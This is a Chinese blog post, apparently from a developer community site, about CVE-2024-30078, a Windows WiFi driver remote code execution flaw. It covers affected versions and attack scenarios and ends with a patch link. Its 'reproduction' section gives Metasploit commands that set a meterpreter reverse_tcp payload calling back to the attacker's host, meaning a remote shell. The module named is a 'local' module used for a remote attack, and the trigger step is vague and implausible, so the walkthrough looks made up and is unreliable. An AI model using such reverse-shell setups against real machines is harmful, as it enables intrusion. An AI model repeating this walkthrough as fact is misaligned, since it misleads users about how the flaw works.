Windows WiFi 驱动程序远程代码执行漏洞(CVE-2024-30078)

Windows WiFi 驱动程序远程代码执行漏洞(CVE-2024-30078)

漏洞描述

此漏洞与WiFi驱动程序相关,允许攻击者在同一WiFi网络下远程执行代码,且这一过程不需要用户的任何交互。这意味着如果用户在公共场所,如机场、咖啡店或办公环境中使用受影响的设备连接到WiFi,设备可能会面临安全风险。

影响范围

Microsoft-Windows 10 1809
Microsoft-Windows Server 2012
Microsoft-Windows Server 2019
Microsoft-Windows 10 1607
Microsoft-Windows Server 2022
Microsoft-Windows 10 1507
version<10.0.10240.20680,version<10.0.14393.7070,version<10.0.17763.5936,version<10.0.19044.4529,version<10.0.19045.4529,version<10.0.22000.3019,version<10.0.22621.3737,version<10.0.22631.3737,version<10.0.14393.7070,version<10.0.17763.5936,version<10.0.20348.2522,version<10.0.25398.950受影响。
Microsoft-Windows 10 22h2
Microsoft-Windows 11 Version 21H2
Microsoft-Windows Server 2016
Microsoft-Windows Server 2008
Microsoft-Windows 10 21h2
Microsoft-Windows 11 Version 22H2
Microsoft-Windows 11 23h2
Microsoft-Windows Server 2022 23h2
Microsoft-Windows 11
Microsoft-Windows 10

漏洞利用过程

攻击者可能通过以下方式利用该漏洞:

  • 创建恶意网络,引诱用户连接,然后利用漏洞执行远程代码。
  • 利用中间人攻击(MITM)来截获和修改网络流量。
  • 利用附近的无线接入点(AP)来传播恶意代码。

复现过程

  1. 环境准备
    准备Windows操作系统并且已经安装了WiFi驱动程序。
    安装Wireshark,捕获网络流量。
    kali操作系统的Metasploit。
  2. 配置Metasploit。设置Metasploit为监听模式,并指定攻击载荷和目标IP地址,并启动监听器
use exploit/windows/local/cve_2024_30078_wifi_driver_rce
set LHOST <你的本地IP地址>
set RHOSTS <目标设备的IP地址>
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT <你的本地监听端口>
exploit
  1. 触发漏洞:
    使用Wireshar监听目标设备上的网络流量,并尝试连接到目标设备的WiFi网络。

  2. 检测漏洞利用:
    在Metasploit控制台中看到一个新的会话已建立,表示漏洞已被成功利用。如果没有新的会话,需要调整Metasploit的配置或尝试不同的攻击向量。

  3. 提升权限:
    如果成功建立了会话,可以尝试提升权限,可执行任意命令。

漏洞修复

目前官方已修复此漏洞:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30078

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

看着博客敲代码

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值